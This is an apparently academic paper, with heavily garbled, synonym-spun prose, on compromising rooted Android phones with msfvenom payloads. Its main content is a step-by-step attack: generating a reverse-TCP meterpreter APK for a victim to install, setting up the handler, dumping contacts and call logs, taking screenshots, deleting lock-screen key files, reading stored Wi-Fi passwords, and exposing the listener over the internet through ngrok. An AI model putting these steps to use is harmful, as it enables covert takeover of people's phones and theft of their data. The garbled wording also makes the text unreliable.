

Vulnerability Testing on Rooted Android Phones Using Msf Venom Payloads

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Abstract—The Metasploit Framework has included the useful tools MSF payload and MSF encode for quite some time. These are the tools which is used to generate payloads in various formats. This paper introduces a new tool which I have been working on for the past week, MSF venom. This tool combines all the capability of MSF payload and MSF encode in a single tool. Combining those gear right into a single tool just made sense. It standardizes command line options, speeds things up a bit higher by using a single framework instance, handles all possible output formats, and brings some balance to payload generation. MSF venom replaced both MSF payload and MSF encode as of June 8th, 2015. Testing vulnerability on rooted device and to check deeper inside the kernel to be able to access or modify those files. Such devices can be easily broken. Even a simple script can cause the attacker to extract data from victim's phone to any other external servers which can accessed by the attacker. Even such rooted device can make the remote attacker to gain root access or full access. So that he can use that device for his/her own will. So, this topic is focused on testing on rooted phones security concerns. Here this paper also uses ngrok for making the framework workable over wan.

Keywords- Kali Linux, Vulnerability Testing, Rooted Android Phones, Msf Venom Payloads

I. INTRODUCTION

Kali Linux is an enterprise-equipped safety auditing, and its miles a distribution primarily based on Debian GNU/Linux. it is aimed at protection experts and IT administrators, it permits them to conduct advanced penetration trying out, forensic analysis, and security auditing. Kali changed into born and released on March 13th, 2013. it's a protection-focused version of Linux that gives many gears to are seeking for out vulnerabilities and allows to comfy the community. It carries several tools which are used closer to numerous protection duties, which include Penetration trying out, protection studies, computer Forensics and reverse Engineering. It was advanced via Manti Aharoni and Devon Kearns of Offensive Security via the rewrite of backtrack, their preceding records penetration testing Linux distribution.[6][10]

A. Features and other information of Kali Linux

- More than 600 penetration testing tools available in Kali
- Free (as in beer) and always will be
- Developed in a secure environment
- Multi-language support
- Completely customizable etc.
- OS Family - Unix like
- Working State – Active
- Kernel Type - Monolithic kernel (Linux)
- Default UI - GNOME3
- release. Kernel 5.2.9, GNOME 3.30.2

B. History of Kali Linux

- Knoppix, ancestor of Kali Linux was the first ever bootable live Linux Operating System,[6] Which is still in existence.
- Knoppix project was then forked into Whoppix and then re-forked into WHAX. [6]
- Backtrack had an extended reign of almost seven years as the penetration testers and hacker's desire.[6]
- Backtrack is a custom designed native environment devoted to hacking. As of 2011 it turned into used by more than four million newbie and professional security researchers.[6]

C. Penetration Testing

It is also called pen testing and it is a practice of trying out a pc system, network, or internet apps to locate vulnerabilities that an attacker could make the most A Penetration test might try to assault the ones vulnerabilities within the equal manner as a malicious hacker is to verify which vulnerabilities are real reducing the actual list of gadget weak spot to a handful of safety weaknesses.[10][6]

Following are the different Strategies of penetration testing

- Targeted testing
- its miles finished by means of the agency's IT group and the penetration trying out teams operating collectively. It is

sometimes referred to as a "lights-turned on" approach because everyone can view the test being carried out.[6][4]

- External testing

This type of check goals a employer's externally seen servers or devices including DNS, e-mail servers, Web servers or firewalls. The aim is to discover if an outdoor attacker can get in and how a way they can get in when they've received get right of entry to.[6][4]

- Internal testing

This test mimics an interior attack in the back of the firewall by using a licensed consumer with preferred get right of entry to privileges. This sort of check is beneficial for estimating how much harm a disgruntled worker may want to cause.[6][4]

- Blind testing

A blind test approach simulates the moves and approaches of a real attacker by means of seriously restricting the facts given to the character or crew that is performing the test ahead. normally, they may most effective be given the call of the employer. because this type of check can require a large amount of time for reconnaissance, it may be high-priced.[6][4]

D. Benefits of Penetration Testing

- Intelligently control vulnerabilities
- keep away from the charge of community downtime
- Meet regulatory requirements and avoid fines

II. METASPLOIT FRAMEWORK

The Metasploit Framework (MSF) is a ways greater than just a collection of exploits—it's also a strong foundation that you may construct upon and easily customise to satisfy your desires.[10] This allows you to concentrate for your unique goal surroundings and not should reinvent the wheel. This paper bear in mind the MSF to be one of the unmarried most useful protection auditing gear freely available to security experts today. From a big selection of commercial grade exploits and an intensive take advantage of development surroundings, all of the way to network information collecting tools and web vulnerability plugins, the Metasploit Framework provides a certainly awesome work surroundings.[1]

As soon as on a goal system, Metasploit's quiver contains a full suite of submit-exploitation equipment, such as privilege escalation, skip the hash, packet sniffing, display capture, keyloggers, and pivoting gear. you can additionally set up a continual backdoor in case the gadget in query receives rebooted. More and more features are being added to Metasploit every year, include a fuzzer to identify potential security flaws in binaries, as well as a long list of auxiliary modules too long to list here.

That is handiest a excessive-stage view of what Metasploit can do. The framework is modular and effortlessly extensible

and enjoys an energetic community. If it doesn't do exactly what you need it to do, you can nearly truly tweak it too healthy.[1][6]

A. Accessing Msfconsole

MSF console affords a command line interface to get entry to and paintings with the Metasploit Framework. The MSF console is the most often used interface to work with the Metasploit Framework. The console lets you do things like scan targets, exploit vulnerabilities, and collect data. The MSF console is probably the maximum popular interface to the Metasploit Framework (MSF). It offers an "all-in-one" centralized console and allows you efficient get right of entry to actually all the alternatives to be had within the MSF. MSF console may additionally seem intimidating in the beginning, however after you examine the syntax of the commands you'll learn how to admire the power of utilising this interface.[1] To run MSF console, open a terminal, cd into the framework directory and type:

```
$ ./msfconsole
```

B. Meterpreter

Meterpreter is a sophisticated, dynamically extensible payload that uses in-reminiscence DLL injection stagers and is extended over the community at runtime. It communicates over the stager socket and provides a complete customer-aspect Ruby API. It capabilities command records, tab of completion, channels, and greater. Meterpreter become firstly written with the aid of Skape for Metasploit 2.x, commonplace extensions have been merged for 3.x and is presently present process an overhaul for Metasploit 3.3. The server portion is implemented in plain C and is now compiled with MSVC, making it fairly transportable.[1] The purchaser may be written in any language however Metasploit has a full-featured Ruby customer API.

C. Other Tools Which Is Used For This Purpose

There is also payload generated hacking can be possible using other tools which are as follows: -

- TheFatRat

it's far a simple Android RAT device to build a backdoor and submit exploitation attacks like browser attack. This Android RAT device produces a malware with mainstream payload and in a while, the perfectly crafted malware is probably finished on windows, Android, Macintosh. AhMyth RAT

AhMyth is a new, up-and-coming, open-supply Android RAT, presently in the beta stages of development, which makes use of a simple GUI interface. even as Android RATs aren't a new component, what makes this one sticks out from the group is the simple and smooth-to-apprehend graphical user interface. moreover, AhMyth is multi-platform, to be had on Linux, windows, and macOS.

III. MSFVENOM PAYLOADS AND ITS WORKING

A. Introduction To MSFvenom

MSF venom is a combination of MSF payload and MSF encode, putting both equipment right into an unmarried

Framework example. MSF venom changed each MSF payload and MSF encode as of June eighth, 2015. These are Metasploit's payload repositories, where the well-known Meterpreter payload resides [5]

B. Payload Generation and Exploitation

Payload can be generated using the following command:

```
Msfvenom -p android/meterpreter/reverse_tcp
LHOST=192.168.1.9 LPORT=4444
R>/home/user/Mod.apk
```


Figure 1: Payload Generation

- LHOST : Your IP address
- LPORT : Listening Port number
- /home/user/Mod.apk => Location to save the Payload to hack android device
- -p : Specify Payload

For knowing your IP address you can use the command **sudo ifconfig.[2]** You will get a following window as output.

Figure 2: ifconfig (network configuration)

C. Exploiting Victim's Device

After generating payload the attacker have to wait for the victim to install the APK then,

- Launching MSF console

Figure 3: Metasploit Console

- use exploit/multi/handler
- Set payload android/meterpreter/reverse_tcp
- Set LHOST 192.168.8.134 (Enter your Internal IP same as in the 1st Part)
- Set LPORT 4444

Figure 4: Setting Listening Host & Port

- Perform exploit command.

After performing exploit command if the framework able to establish a connection over the victim's device meterpreter window will be launched.

Figure 5: Performing Exploit

Following is an example of performing a **sysinfo** command on victim's device.[3]

Figure 6: Performing sysinfo Command

Another example of performing a image capture command on victim's device.

Figure 7: Performing Screenshot Command

D. Exploit Commands

Some of the commands used for exploiting are: -

- Geolocate: Get current lat-long the use of geolocation
- Screenshare: Watch the far off user's laptop in real time.
- Screenshot: grasp a screenshot of the interactive laptop.
- Shell: it launches a terminal on sufferer's device.

IV. EXPLOITING ROOTED DEVICE USING SHELL

If the device is rooted. The attacker can effortlessly gain permission over the sufferer's device. A rooted tool is an Android system that has been jailbroken to put in unapproved apps, replace OS, delete undesirable apps, underclock or overclock the processor, update firmware and customise something else.[3]

Rooting is frequently performed with the aim of overcoming obstacles that companies and hardware manufacturers placed on a few gadgets. consequently, rooting gives the ability (or permission) to modify or update system programs and settings, run specialised applications ("apps") that require administrator-degree permissions, or perform other operations that are in any other case inaccessible to a everyday Android user.[9]

On Android, rooting can also facilitate the entire removal and alternative of the tool's running device, generally with a extra current release of its contemporary running machine.

This rooted device allows explicit permission over the root file directories which leads to vulnerability over the root system which includes android kernel.

This grants an advantage to attacker for dumping any scripts or any other malicious files which can lead to a complete access over the victim. If the device is rooted a third-party software can access super root permission over any other applications which includes read, write, execute operations. These applications can be the malicious payloads generated by the attacker.

Given below are some operations which an attacker can penetrate deeper inside the root directory.

- Bypassing / Removing Screen Lock
- Getting WIFI Configurations

A. Bypassing / Removing Screen Lock

When a lock created whatever the type there will be a key file will be stored in the root directory. If the hacker able to modify the key file he can then bypass the screen lock.

Steps:

1. After establishing connection over the victim's device
2. Check the root status of the phone using check_root command

```

Command      Description
-----
check_root   Check if device is rooted
dump_callog  Get call log
dump_contacts Get contacts list
    
```

Figure 8: Performing check_root Command

3. After that launch a shell window, to perform Linux scripting commands [11]
4. First perform **Su** command for gaining super admin access.
5. After that navigate to the folder where the key file is stored.
6. cd data/system

```

packages.list
packages.xml
password.key
    
```

Figure 9: Output of searching Password Key file

7. Remove the password.key file for removing password or number locks.
8. For removing pattern locks remove the gesture.key

```

entropy.dat
framework_atlas.config
gesture.key
ifw
    
```

Figure 10: Output of searching Gesture key file

B. Getting WIFI Configurations

WIFI configuration including the stored WIFI password are stored in root directory as wpa_supplicant.conf file. Fetching that file, you can simply follow the above steps till launching shell window and fetching super admin access. Then,

- Navigate to /data/misc/wifi
- Print wpa_supplicant.conf file using CAT command
- E.g. Cat wpa_supplicant.conf
- You will get a similar like result.

```

cat wpa_supplicant.conf
ctrl_interface=eth1
update_config=1
device_name=vbox86p
manufacturer=
model_name=Samsung Galaxy Note 2
model_number=Samsung Galaxy Note 2
serial_number=
device_type=10-0050f204-5
config_methods=physical_display virtual_push_button

network={
    ssid="WiredSSID"
    key_mgmt=NONE
    priority=1
}

network={
    ssid="fj}wlt5ji"
    scan_ssid=1
    key_mgmt=NONE
    auth_alg=OPEN SHARED
    wpa_key0="paass"
}
    
```

Figure 11: Wi-Fi configuration file

C. Features

The advantages of MSF venom are:

- One single tool
- Standardized command line options
- Increased speed

D. Limitations

The Disadvantages of MSF venom are:

- Penetration only possible whenever the payload gets installed in the victim's system.
- Less compatibility on newer android version
- To access system files on victim's device root permission requires.
- Penetration only possible when the device is connected to the same network where the attacker's device is connected.

V. ATTACK OVER WAN

A. Attack Over Wan Using NGROK

ngrok is a cross-platform application that enables developers to expose a local development server to the Internet with minimal effort.[7] The software makes the consumer's regionally hosted web server look like hosted on a subdomain of ngrok.com, which means that no public IP or domain name on the nearby device is needed. comparable capability is carried out with reverse SSH Tunneling, but this calls for more setup in addition to hosting with own faraway server.

ngrok can pass NAT Mapping and firewall regulations by growing a long-lived TCP tunnel from a randomly generated subdomain on ngrok.com (e.g., 6ef192ks.ngrok.com) to the neighborhood server machine. After specifying the port that your net server listens on, the ngrok patron software initiates a comfortable connection to the ngrok server after which everybody could make requests on your nearby server with the particular ngrok tunnel cope with.

Why Ngrok?

Ngrok helps to expose a local development server to the Internet. The main limitation of Msfvenom payloads, exploits can only do on the device which is connected to the same network the attacker's device is connected.[8]

Attack Over Wan

Attack over Wan using Msfvenom payloads can be done as follows:

1. Create an account on Ngrok to download
2. First you need to install Ngrok in your Kali machine.

3. Fire up Kali, and browse Ngrok to access its official website: <https://ngrok.com/>
4. You must make an account first. Go to signup option and fill all the necessary fields. [7]
5. After signing up, you can download ngrok installer for Linux.
6. Unzip the downloaded file

Figure 12: Installing ngrok (ls command result)

7. Go to Download directory where your downloaded file resides.
8. Copy the token, given for your account

Figure 13: Sample token for registering ngrok account

9. After unzipping, you must store the token that was given for your account.
10. Copy the token and paste it inside the Linux terminal. ensure to paste the token in an actual equal listing in which ngrok documents are stored.[7]

Figure 14: Registering token to use server

11. You are all set to use this tool. Type in terminal: /ngrok TCP [Port no:] (choose any port number on which you want to bind a connection)

Figure 15: Exposing Web Server

12. After that generate a payload using LHOST and LPORT as the IP address generated in Ngrok server. And the port no will be 4242 in this case. [7]
13. If you want to get the exact IP address of the forwarding address you can use the HOST command.[7] E.g., host tcp://0.tcp.ngrok.io:10900
14. After generating payload using the above parameters you will be able to access any devices connected over different network.

VI. SUCCESS RATIO ANALYSIS

The success ration is calculated by testing the payload working and vulnerability identified by penetrating on different OS versions. So, the payload is tested on different victims' device. Especially from 4.0 to Higher. The result chart as follows: -

Figure 16: Success Testing Ratio Chart

VII. CONCLUSION

Earlier the attackers were using the manual method to generate a payload in MSF venom command and then use Metasploit module "multi/handler" to access the reverse connection via enterpriser session and this technique was quite successfully approached to compromise a victim's machine although took much time. But the same approach is applicable with the help of MSFPC for generating various "basic" Meterpreter payloads via MSF venom.

It is just a mere tool for penetrating on various devices, there are also other tools works as same as MSF venom. The most effective exploit can be done on rooted device than unrooted phone. Because these stock ROM devices won't allow third party software to access root directory. Whatever apps you are installing in your device, it's the user who grants the permission for the app to use your device features. After getting a session you know that an attacker can easily get your info, steal your contacts, messages, app data and many more. So, gaining access of your phone is that much easier when you don't have awareness.

A healthy tip to comfortable your Android device is to not deploy any utility from an unknown supply, even in case you really need to install it, try to read, and examine its supply code to get an concept whether or not this file is malicious or now not

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